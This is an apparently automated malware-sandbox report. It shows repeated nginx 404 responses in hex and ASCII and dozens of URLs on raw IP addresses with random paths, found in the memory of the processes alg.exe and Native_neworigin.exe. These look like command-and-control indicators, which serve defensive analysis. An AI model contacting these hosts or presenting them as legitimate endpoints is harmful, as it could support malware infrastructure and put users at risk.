62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:59:05 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:59:06 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: alg.exe, 00000022.00000003.2446009631.00000000001A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/
                    Source: alg.exe, 00000022.00000003.2141318438.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/kha
                    Source: alg.exe, 00000022.00000003.2141318438.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/kha
                    Source: alg.exe, 00000022.00000003.2676022398.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/vudapeuvP
                    Source: alg.exe, 00000022.00000003.2296248107.000000000015E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.13.20/aisrtinfavo
                    Source: alg.exe, 00000022.00000003.2307499755.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2297056375.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2295316988.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.13.20/vblbtbbfmivxyja
                    Source: alg.exe, 00000022.00000003.2307499755.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2297056375.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2295316988.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.13.20/vblbtbbfmivxyjamk
                    Source: alg.exe, 00000022.00000003.2297056375.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2295316988.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.13.20:80/aisrtinfavo
                    Source: alg.exe, 00000022.00000003.2184135314.00000000001A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/
                    Source: Native_neworigin.exe, 00000020.00000003.1758511050.0000000005419000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000003.1758638559.0000000005432000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000003.1758806915.0000000005447000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/bya
                    Source: Native_neworigin.exe, 00000020.00000003.1758511050.0000000005419000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000003.1758638559.0000000005432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/bya5D
                    Source: alg.exe, 00000022.00000003.2195214588.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2184135314.000000000018A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/sycehlfxifni
                    Source: alg.exe, 00000022.00000003.1912810265.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.1799180308.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2003839960.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.1797273524.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.1786459998.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138:80/ikqsakdpetf
                    Source: alg.exe, 00000022.00000003.2195214588.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138:80/sycehlfxifni
                    Source: alg.exe, 00000022.00000003.1912810265.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.1799180308.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2003839960.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.1797273524.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138:80/uspwu
                    Source: Native_neworigin.exe, 00000020.00000002.1953055035.0000000005383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/bB
                    Source: alg.exe, 00000022.00000003.2711594613.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/fvijpyejxccmhfmi
                    Source: alg.exe, 00000022.00000003.2711594613.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/fvijpyejxccmhfmiUk
                    Source: alg.exe, 00000022.00000003.1824443533.0000000000179000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/j
                    Source: alg.exe, 00000022.00000003.1824443533.0000000000179000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/jSs
                    Source: alg.exe, 00000022.00000003.1749027577.000000000015E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/jevf
                    Source: alg.exe, 00000022.00000003.1749027577.000000000015E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/jevf7
                    Source: Native_neworigin.exe, 00000020.00000002.1955667464.00000000053EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/lwhipkemtkmayb
                    Source: Native_neworigin.exe, 00000020.00000002.1955667464.00000000053EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/lwhipkemtkmaybM#
                    Source: Native_neworigin.exe, 00000020.00000002.1955667464.00000000053EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/lwhipkemtkmaybroceAt
                    Source: alg.exe, 00000022.00000003.2802142836.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/esxyeqyttvDC
                    Source: alg.exe, 00000022.00000003.2166690371.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/idasaqnrl
                    Source: alg.exe, 00000022.00000003.2141318438.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.1912810265.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2149940781.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2003839960.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/j0
                    Source: alg.exe, 00000022.00000003.2877316790.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/jarjdamitgg.l
                    Source: alg.exe, 00000022.00000003.2411018464.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/obyashlqvnPLl
                    Source: alg.exe, 00000022.00000003.2370669430.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/rbpfcskrcskbo
                    Source: alg.exe, 00000022.00000003.2207793002.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/jisysli
                    Source: alg.exe, 00000022.00000003.2207793002.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/jisyslixifni
                    Source: alg.exe, 00000022.00000003.2925345172.000000000015E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/kxlr
                    Source: alg.exe, 00000022.00000003.2925345172.000000000015E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/kxlrs
                    Source: alg.exe, 00000022.00000003.2429430212.000000000018A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/msvrffxklscfuxyf
                    Source: alg.exe, 00000022.00000003.2638386864.000000000019D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2658028986.000000000019E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2636691648.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/ngmt
                    Source: alg.exe, 00000022.00000003.2411018464.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/srhcrhfsmrpwwl
                    Source: alg.exe, 00000022.00000003.2411018464.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/srhcrhfsmrpwwlPk
                    Source: alg.exe, 00000022.00000003.2411018464.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/srhcrhfsmrpwwlSk
                    Source: alg.exe, 00000022.00000003.2207793002.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248:80/jisysli
                    Source: alg.exe, 00000022.00000003.2926967539.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248:80/kxlrobat
                    Source: alg.exe, 00000022.00000003.2676022398.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2636691648.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248:80/ngmt
                    Source: alg.exe, 00000022.00000003.2723141783.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248:80/vv
                    Source: alg.exe, 00000022.00000003.2547916936.000000000015E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120/wlytwhn
                    Source: alg.exe, 00000022.00000003.2318309806.000000000018A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/soxbjfwpcadsyans
                    Source: alg.exe, 00000022.00000003.2241252396.0000000000179000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2224502951.0000000000179000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/vxagkgmfv
                    Source: alg.exe, 00000022.00000003.2320571977.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2354326017.000000000015E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/xg
                    Source: alg.exe, 00000022.00000003.2320571977.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2354326017.000000000015E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/xg7
                    Source: alg.exe, 00000022.00000003.2890804506.000000000018A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/yeixpxtqdbglifq
                    Source: alg.exe, 00000022.00000003.2337200289.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245:80/soxbjfwpcadsyansOh
                    Source: alg.exe, 00000022.00000003.2353534321.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2337200289.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245:80/xg
                    Source: alg.exe, 00000022.00000003.2559882055.000000000018A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.254.94.185/fflfjsnvrvmguebc
                    Source: alg.exe, 00000022.00000003.2815789572.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2844463663.000000000015E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.254.94.185/pwpf
                    Source: alg.exe, 00000022.00000003.2815789572.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2844463663.000000000015E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.254.94.185/pwpfp
                    Source: alg.exe, 00000022.00000003.2967749938.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.254.94.185:80/dxdpaygfruq
                    Source: alg.exe, 00000022.00000003.2296248107.000000000015E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34/
                    Source: alg.exe, 00000022.00000003.2296248107.000000000015E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34/1
                    Source: alg.exe, 00000022.00000003.2296248107.000000000015E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34/fmngqrfquhhkif
                    Source: alg.exe, 00000022.00000003.2411018464.0000000000179000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2492676858.0000000000179000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2307499755.0000000000179000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2420511418.0000000000179000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2282224682.0000000000179000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2372125157.0000000000179000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2408918496.000000000017C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34/fmngqrfquhhkifA
                    Source: alg.exe, 00000022.00000003.2296248107.000000000015E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34/fmngqrfquhhkifgs8
                    Source: alg.exe, 00000022.00000003.2526697223.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2528462938.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45/nfkpu
                    Source: alg.exe, 00000022.00000003.2526697223.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2528462938.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45/nfkpugs6288
                    Source: alg.exe, 00000022.00000003.2337200289.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45/wsppsfoumisskbo
                    Source: alg.exe, 00000022.00000003.2526697223.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45:80/nfkpuLl
                    Source: alg.exe, 00000022.00000003.2913394064.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45:80/w
                    Source: alg.exe, 00000022.00000003.2337200289.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45:80/wsppsfoumisskbo
                    Source: alg.exe, 00000022.00000003.2195214588.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2207793002.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160/umftqsqq
                    Source: alg.exe, 00000022.00000003.2195214588.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2207793002.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160/umftqsqqUk
                    Source: alg.exe, 00000022.00000003.2195214588.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160/umftqsqqyk
                    Source: alg.exe, 00000022.00000003.2676022398.000000000018A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160/xuP
                    Source: alg.exe, 00000022.00000003.2195214588.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2207793002.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160:80/umftqsqq
                    Source: alg.exe, 00000022.00000003.2723141783.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2711594613.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2676022398.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160:80/xuxrbcrkxovprjs
                    Source: alg.exe, 00000022.00000003.2913394064.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2901500025.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2967749938.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2926967539.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2877316790.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200:80/gajxy
                    Source: alg.exe, 00000022.00000003.2411018464.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/xjaepin
                    Source: alg.exe, 00000022.00000003.2914974352.000000000015E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/xprpgfukortnennm
                    Source: alg.exe, 00000022.00000003.1797273524.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.1786459998.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/nu
                    Source: alg.exe, 00000022.00000003.2149940781.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/sa
                    Source: alg.exe, 00000022.00000003.2901500025.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/xprpgfukortnennmP
                    Source: alg.exe, 00000022.00000003.2141318438.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/kywuwrijhguqpyu
                    Source: alg.exe, 00000022.00000003.2627341141.000000000015E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/ovpu
                    Source: alg.exe, 00000022.00000003.2627341141.000000000015E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/ovputtings/
                    Source: alg.exe, 00000022.00000003.2141318438.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212:80/kywuwrijhguqpyu
                    Source: alg.exe, 00000022.00000003.2834032819.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2831205779.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212:80/sv0
                    Source: alg.exe, 00000022.00000003.1726694994.000000000017C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/eoqitiy
                    Source: Native_neworigin.exe, 00000020.00000003.1758689700.00000000053F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/iwtyrexju
                    Source: alg.exe, 00000022.00000003.2954389198.000000000015E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/qmctu
                    Source: alg.exe, 00000022.00000003.2954389198.000000000015E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/qmctusn
                    Source: alg.exe, 00000022.00000003.2967749938.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/brgveksk
                    Source: alg.exe, 00000022.00000003.1912810265.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.1799180308.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2003839960.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.1797273524.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.1786459998.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/chqlbpn
                    Source: alg.exe, 00000022.00000003.2353534321.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/jafoumisskbo
                    Source: alg.exe, 00000022.00000003.2307499755.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/jfcmbfmivxyjaX
                    Source: alg.exe, 00000022.00000003.2967749938.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/qmctu
                    Source: alg.exe, 00000022.00000003.2242323432.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2627341141.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2430544276.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2122882435.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2296248107.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2274219091.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2141791316.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2106221522.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2195841831.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2320571977.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2547916936.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2004099122.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2354326017.000000000015E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/ceginiuaduqvi
